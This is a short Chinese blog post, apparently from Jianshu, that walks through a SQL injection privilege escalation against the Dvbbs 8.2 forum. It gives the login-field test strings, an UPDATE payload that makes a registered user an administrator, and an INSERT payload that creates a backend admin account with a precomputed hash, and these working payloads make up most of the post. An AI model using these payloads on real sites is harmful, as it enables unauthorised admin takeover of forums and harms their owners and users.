过滤不足的提权

(动态论坛8.2)

先注册一个账户


然后退出账户登陆,在登陆框尝试注入(1)登录:san’ and ‘a’=’a 密码:1234567 (2)登录:san’ and ‘a’=’b,密码:1234567


提示错误,注入生效,再次注入';update dv_user set usergroupid=1 where username='san'--

(进行提权)


注入完成后,登陆刚开始注册的账号,从管理权限可以看出已经是前台管理权限了



再次推出登陆,

使用以下语句登录,密码为正确密码:san';insert into dv_admin (username,password,flag,adduser) values('san','49ba59abbe56e057','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45','san')--【注意:49ba59abbe56e057是123456的cmd16位密文

打卡管理员网址xxx.xx.xx.x/admin

用注册的账户进行登陆,发现成功提权后台管理

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 网络安全实验报告 第二章
    利用TCP协议实现synflood攻击 运行syn攻击程序,以靶机为目标主机对其发送syn数据包,查看目标主机状态...
    yingtaomj阅读 2,268评论 0 1
  • Spring Cloud
    Spring Cloud为开发人员提供了快速构建分布式系统中一些常见模式的工具(例如配置管理,服务发现,断路器,智...
    卡卡罗2017阅读 134,904评论 18 139
  • Django的一些学习demo说明
    Web框架之Django: (1)简介: Django是一个由Python写成开源的重量级Web应用框架,采用MT...
    老肖阅读 3,077评论 0 18
  • 一片金黄醉清秋
    此去又何处 不觉霜寒重 听商音轻扬和hè飞鸿 纵是千般不舍 欲语还休 已放下矜持 许你一次回眸 看满目金黄醉清秋 ...
    柏莲华阅读 379评论 0 3
  • 设计师的分类(个人向)
    今天在某设计网站上看到了一些东西,很有感触,所以在这里写一下自己关于设计师分类的的一些想法。 这个分类的标准是设计...
    Mu_Xin阅读 2,982评论 0 1